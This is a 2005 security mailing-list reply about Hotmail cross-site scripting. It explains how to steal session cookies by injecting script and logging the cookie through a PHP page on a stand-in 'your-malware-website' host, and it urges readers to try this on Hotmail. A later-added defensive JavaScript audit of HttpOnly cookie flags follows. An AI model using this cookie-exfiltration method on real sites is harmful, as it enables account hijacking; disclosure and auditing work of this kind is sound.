Date: Wed, 4 May 2005 14:41:15 +0200
From: "Jerome Athias" <>
To: "Sherwyn Williams" <>,
	"Luis A. Cortes Zavala" <>,
	<>, <>,
Subject: Re: Re: [VulnWatch] Hotmail Advisories

> Ok I think I get what you are saying, however to use this vuln, would
> need to have a script running on a server somewhere that receives the
> username and password?
> Or just based on what you have here this can be possible. If one does not
> have knowledge of JavaScript, all they would have to do is use those
> various html codes you wrote and send that to them as an attachment, but
> how would I get the username and password ????

For example, this is a simple way to steal a cookie:

Inject this code:


And on "your-malware-website" put this page:

echo $HTTP_COOKIE_VARS["cook"];

and so, the cookie will be logged in "your-malware-website"

>> I was testing this until I can get some working code, the authorization and
>> validation of the site is one of the better that I have seen on a mailing
>> system, I never heard about vulnerabilities of hotmail as in other systems,
>> I just have knowledge of two flaws discovered. One in 1999 is from George
>> Guninski, and the other when the pwdreset function make its public, every
>> year hotmail is updated, and getting more secure, and it's hard to believe
>> that no one has found this before.

Try to play with this in hotmail


Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -
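
Added example, not part of the original message or the list archive: script injected into a page can read only cookies that are not marked HttpOnly, so the cookie theft described above can be checked for from the defender's side by auditing the Set-Cookie headers a site sends. The function names and the sample headers below are constructed for illustration.

```javascript
// Audit Set-Cookie header values and report which cookies page script could read.
// SAMPLE_HEADERS is constructed test data, not captured from any real site.

// Parse one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || "";
  const eq = first.indexOf("=");
  if (eq < 1) return null; // missing cookie name: treat as malformed
  const attrs = {};
  for (const p of parts) {
    const i = p.indexOf("=");
    // Attribute names are case-insensitive; flag attributes have no value.
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : p.slice(i + 1).trim();
  }
  // Only the first "=" separates name from value; the value may contain "=".
  return { name: first.slice(0, eq).trim(), value: first.slice(eq + 1), attrs };
}

// Audit one header: is the cookie exposed to script, and is it sent over plain HTTP?
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  if (!c) return { name: null, malformed: true, scriptReadable: false, plainHttp: false };
  return {
    name: c.name,
    malformed: false,
    scriptReadable: !c.attrs.httponly, // visible in document.cookie
    plainHttp: !c.attrs.secure,        // also sent on unencrypted requests
  };
}

// Names of cookies that script running in the page could read and send elsewhere.
function scriptReadableCookies(headers) {
  return headers.map(auditSetCookie).filter((r) => r.scriptReadable).map((r) => r.name);
}

const SAMPLE_HEADERS = [
  "session=abc123; Path=/",
  "auth=Zm9v=YmFy; Path=/; Secure; HttpOnly",
  "prefs=lang=en; HTTPONLY",
  "=broken",
];

console.log(scriptReadableCookies(SAMPLE_HEADERS));
```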
